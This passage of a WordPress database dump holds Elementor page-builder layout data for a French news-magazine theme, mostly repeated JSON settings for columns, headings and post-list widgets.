gin_bottom\":10,\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(1374,480,'_elementor_version','0.4'),(1375,480,'_elementor_css','a:3:{s:4:\"time\";i:1508914766;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1376,481,'_elementor_edit_mode','builder'),(1377,481,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"q73qhhi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"text_align\":\"left\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_line_height\":{\"unit\":\"em\",\"size\":1.4},\"use_category_post_list_1\":\"\",\"post_list_1_title_line_height\":{\"unit\":\"em\",\"size\":1.4},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":15},\"use_meta_post_list_1\":\"\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_font_size\":{\"unit\":\"px\",\"size\":3},\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.4},\"post_list1_margin_bottom\":10,\"width\":\"400\",\"height\":\"400\",\"_background_background\":\"classic\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(1378,481,'_elementor_version','0.4'),(1379,482,'_elementor_edit_mode','builder'),(1380,482,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"sprea